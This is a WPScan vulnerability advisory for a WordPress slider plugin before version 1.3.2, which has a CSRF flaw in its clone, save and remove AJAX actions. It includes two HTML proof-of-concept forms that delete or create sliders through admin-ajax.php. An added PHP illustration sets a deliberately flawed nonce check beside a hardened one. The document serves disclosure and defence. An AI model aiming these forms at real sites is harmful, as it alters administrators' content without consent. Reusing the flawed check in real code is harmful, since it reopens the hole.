WordPress Plugin Vulnerabilities
Responsive Image Slider, Photo Gallery And Carousel < 1.3.2 - Slider Clone/Save/Delete via CSRF
Description
The plugin has a logic flaw in its CSRF checks in the sf_clone_slider, sf_save_slider and sf_remove_slider AJAX actions, which could allow an attacker to make a logged-in user call them via a CSRF attack.
Proof of Concept
To delete a slider:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="sf_remove_slider" />
      <input type="hidden" name="do_action" value="single" />
      <input type="hidden" name="sf_slider_id" value="2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

To create a slider:

<html>
  <body>
    <form action="https://example.com/wp-admin/admin-ajax.php" method="POST">
      <input type="hidden" name="action" value="sf_save_slider" />
      <input type="hidden" name="sf_slider_id" value="1" />
      <input type="hidden" name="sf_slider_layout" value="1" />
      <input type="hidden" name="sf_slider_title" value="CSRF" />
      <input type="hidden" name="sf_slide_ids" value="" />
      <input type="hidden" name="sf_slide_titles" value="" />
      <input type="hidden" name="sf_slide_descs" value="" />
      <input type="hidden" name="sf_1_width" value="100%" />
      <input type="hidden" name="sf_1_height" value="100%" />
      <input type="hidden" name="sf_1_auto_play" value="true" />
      <input type="hidden" name="sf_1_sorting" value="0" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
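The forms above carry no nonce field at all, so the affected checks let a request with no token through. The following is an added example, not the plugin's code: it contrasts one common shape of such a logic flaw (an assumption, since the advisory does not show the source) with a handler that rejects the same request. The function names, nonce action, nonce field name and capability are hypothetical.

```php
<?php
// Added illustration, not the plugin's code. The nonce action, field name
// and capability below are assumptions chosen for this example.
const EXAMPLE_NONCE_ACTION = 'example_sf_slider'; // hypothetical
const EXAMPLE_NONCE_FIELD  = 'nonce';             // hypothetical

// FLAWED shape (assumed): the nonce is verified only when the request
// carries one, so a cross-site form that omits the field skips the check.
function example_sf_remove_slider_flawed() {
    if ( isset( $_POST[ EXAMPLE_NONCE_FIELD ] )
        && ! wp_verify_nonce( $_POST[ EXAMPLE_NONCE_FIELD ], EXAMPLE_NONCE_ACTION ) ) {
        wp_die( 'Invalid nonce', '', array( 'response' => 403 ) );
    }
    // State-changing work would run here even when no nonce was sent.
}

// HARDENED shape: a missing nonce is a failure, and the caller must also
// hold a capability that is allowed to manage sliders.
function example_sf_remove_slider_hardened() {
    // Answers 403 and stops when the field is absent or does not verify.
    check_ajax_referer( EXAMPLE_NONCE_ACTION, EXAMPLE_NONCE_FIELD );

    if ( ! current_user_can( 'manage_options' ) ) { // capability is an assumption
        wp_send_json_error( 'Forbidden', 403 );
    }

    // Validate the only input this action needs before acting on it.
    $slider_id = isset( $_POST['sf_slider_id'] ) ? absint( $_POST['sf_slider_id'] ) : 0;
    if ( 0 === $slider_id ) {
        wp_send_json_error( 'Missing slider id', 400 );
    }

    // The slider identified by $slider_id would be deleted here.
    wp_send_json_success( array( 'removed' => $slider_id ) );
}
add_action( 'wp_ajax_sf_remove_slider', 'example_sf_remove_slider_hardened' );
```

The same two checks apply to the sf_clone_slider and sf_save_slider handlers; the admin page that issues these requests would embed the matching token with wp_create_nonce().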
Affects Plugins
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
WPScanTeam
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2021-10-18 (about 2 years ago)
Added
2021-10-18 (about 2 years ago)
Last Updated
2021-10-18 (about 2 years ago)